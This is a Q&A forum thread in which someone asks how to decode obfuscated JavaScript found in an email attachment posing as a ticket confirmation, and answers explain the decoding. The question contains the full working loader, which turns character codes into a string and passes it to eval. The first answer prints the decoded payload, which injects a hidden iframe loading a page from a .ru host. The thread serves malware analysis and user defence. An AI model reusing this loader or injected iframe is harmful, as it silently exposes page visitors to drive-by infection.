Deobfuscate/Parse String

Question

I received the following in an email attachment today stating that it was a confirmation for a ticket that I supposedly bought. Please help me understand how one would go about deconstructing this code...

<script>
c = 2;
i = c - 2;
if (window.document) try {
    new c.prototype
} catch (hgberger) {
    f = ['-29n-29n67n64n-6n2n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n3n85n-25n-29n-29n-29n67n64n76n59n71n63n76n2n3n21n-25n-29n-29n87n-6n63n70n77n63n-6n85n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n81n76n67n78n63n2n-4n22n67n64n76n59n71n63n-6n77n76n61n23n1n66n78n78n74n20n9n9n62n72n80n64n73n62n73n73n77n66n62n69n64n66n66n59n8n76n79n20n18n10n18n10n9n67n71n59n65n63n77n9n59n79n60n70n60n84n62n72n67n8n74n66n74n1n-6n81n67n62n78n66n23n1n11n10n1n-6n66n63n67n65n66n78n23n1n11n10n1n-6n77n78n83n70n63n23n1n80n67n77n67n60n67n70n67n78n83n20n66n67n62n62n63n72n21n74n73n77n67n78n67n73n72n20n59n60n77n73n70n79n78n63n21n70n63n64n78n20n10n21n78n73n74n20n10n21n1n24n22n9n67n64n76n59n71n63n24n-4n3n21n-25n-29n-29n87n-25n-29n-29n64n79n72n61n78n67n73n72n-6n67n64n76n59n71n63n76n2n3n85n-25n-29n-29n-29n80n59n76n-6n64n-6n23n-6n62n73n61n79n71n63n72n78n8n61n76n63n59n78n63n31n70n63n71n63n72n78n2n1n67n64n76n59n71n63n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n77n76n61n1n6n1n66n78n78n74n20n9n9n62n72n80n64n73n62n73n73n77n66n62n69n64n66n66n59n8n76n79n20n18n10n18n10n9n67n71n59n65n63n77n9n59n79n60n70n60n84n62n72n67n8n74n66n74n1n3n21n64n8n77n78n83n70n63n8n80n67n77n67n60n67n70n67n78n83n23n1n66n67n62n62n63n72n1n21n64n8n77n78n83n70n63n8n74n73n77n67n78n67n73n72n23n1n59n60n77n73n70n79n78n63n1n21n64n8n77n78n83n70n63n8n70n63n64n78n23n1n10n1n21n64n8n77n78n83n70n63n8n78n73n74n23n1n10n1n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n81n67n62n78n66n1n6n1n11n10n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n66n63n67n65n66n78n1n6n1n11n10n1n3n21n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n8n59n74n74n63n72n62n29n66n67n70n62n2n64n3n21n-25n-29n-29n87'][0].split('n');
    md = 'a';
    e = window["e" + "val"];
    w = f;
    s = [];
    r = String;
    for (; 613 != i; i += 1) {
        j = i;
        s += r.fromCharCode(38 + 1 * w[j]);
    }
    e(s);
}</script>

Answer 1

Unobfuscated:

if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');f.setAttribute('src','http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

Answer 2

I took the code you posted, and pasted it verbatim into http://jsfiddle.net. The only thing I changed (and I recommend this) was changing the call to e(s) to alert(s). That way, your browser won't try to execute the embedded code, but just display it for you.

You'll see some dodgy stuff about iframes and dnvfodooshdkfhha.ru, which seems spammy.

Answer 3

It looks like that string is a list of character codes separated by 'n' s. If you run the code with the last line replaced with 'alert(s)' instead of e(s) you will see the obfuscated code that your malware is trying to 'eval'